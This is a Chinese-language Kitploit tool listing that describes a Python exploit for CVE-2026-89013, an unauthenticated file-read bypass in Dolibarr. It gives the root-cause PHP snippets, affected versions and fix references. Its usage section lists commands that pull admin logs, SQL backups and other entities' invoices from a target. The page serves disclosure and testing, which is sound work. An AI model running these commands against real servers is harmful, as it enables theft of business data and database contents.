Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-89013 — 针对 CVE-2026-89013 的 Python 漏洞利用工具,该漏洞是 Dolibarr hashp 未授权访问绕过,可导致任意文件读取,支持 check、list、hunt、read 和 download 模式。 | Kitploit
工具/GitHubGitHub/faceless0x7/cve-2026-89013
漏洞分析漏洞利用Web应用程序漏洞利用数据泄露信息收集Web安全渗透测试身份验证
GitHubfaceless0x7/cve-2026-89013

CVE-2026-89013

针对 CVE-2026-89013 的 Python 漏洞利用工具,该漏洞是 Dolibarr hashp 未授权访问绕过,可导致任意文件读取,支持 check、list、hunt、read 和 download 模式。

查看仓库
116小时12分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-89013 — Dolibarr hashp=shared 授权绕过

针对 CVE-2026-89013 的漏洞利用:当存在 hashp 参数时,document.php 和 viewimage.php 会强制 NOLOGIN。内部标记值 shared 会跳过共享令牌解析,但访问控制覆盖仍会对任何非空值生效,并设置 $accessallowed = 1,从而丢弃 dol_check_secure_access_document() 的结果。因此,未经身份验证的请求可以读取每个 modulepart 树中的任意文件:业务文档、管理员日志、SQL 备份(modulepart=systemtools)、自定义模块源代码(modulepart=packages),以及通过 &entity=N 访问其他多公司实体。

记录:https://www.cve.org/CVERecord?id=CVE-2026-89013

受影响Dolibarr 23.0.4 – 24.0.0
已修复24.0.1
前提条件无(未经身份验证)
影响在 Dolibarr 管理的目录内任意文件读取

根本原因

root@kitploit:~
// htdocs/document.php:189 (24.0.0) — 'shared' skips token resolution
if (!empty($hashp) && $hashp != 'shared') { ...resolve share token... }

// htdocs/document.php:292 — but any hashp forces access
if (!empty($hashp)) {
    $accessallowed = 1;
    $sqlprotectagainstexternals = '';
}

这是提交 5028dae981e(2026-08-12)的回归,首次随 23.0.4 和 24.0.0 发布。路径遍历(../)在服务端已被清理——这是授权绕过,而非路径遍历。

用法

root@kitploit:~
# detection (safe, nonexistent canary file)
python3 CVE-2026-89013.py https://erp.local check

# readable modulepart trees
python3 CVE-2026-89013.py https://erp.local list

# hunt: dolibarr.log + SQL backups (generated filenames) + user vcards
python3 CVE-2026-89013.py https://erp.local hunt --db-name dolibarr --days 3 --save

# read / download
python3 CVE-2026-89013.py https://erp.local read logs/admin/logs/dolibarr.log
python3 CVE-2026-89013.py https://erp.local download systemtools/backup/backup.sql
python3 CVE-2026-89013.py https://erp.local read facture/FA2601-0001/FA2601-0001.pdf --entity 2

# PDFs via viewimage.php
python3 CVE-2026-89013.py https://erp.local viewimage facture/FA2601-0001/FA2601-0001.pdf

仅使用标准库(Python 3.8+)。支持 --proxy、--insecure、--timeout。

demo

参考

  • CVE 记录:https://www.cve.org/CVERecord?id=CVE-2026-89013
  • 修复版本:https://github.com/Dolibarr/dolibarr/releases/tag/24.0.1
  • 修复提交:
    • https://github.com/Dolibarr/dolibarr/commit/cd05688dbed8a4af6eef32faf4fc1e823a37bce9
    • https://github.com/Dolibarr/dolibarr/commit/a8bc4a63e1b6356884abcd83c4a38954d9649b0b
    • https://github.com/Dolibarr/dolibarr/commit/3bd8aa8b909e596d7dab4388d0466ec24e6ad191
  • 回归来源:https://github.com/Dolibarr/dolibarr/commit/5028dae981e47dfab349f8fe2ef79b54ae95d1b6

免责声明

仅用于授权测试和研究。仅可针对您拥有或已获得明确测试许可的系统使用。

下载工具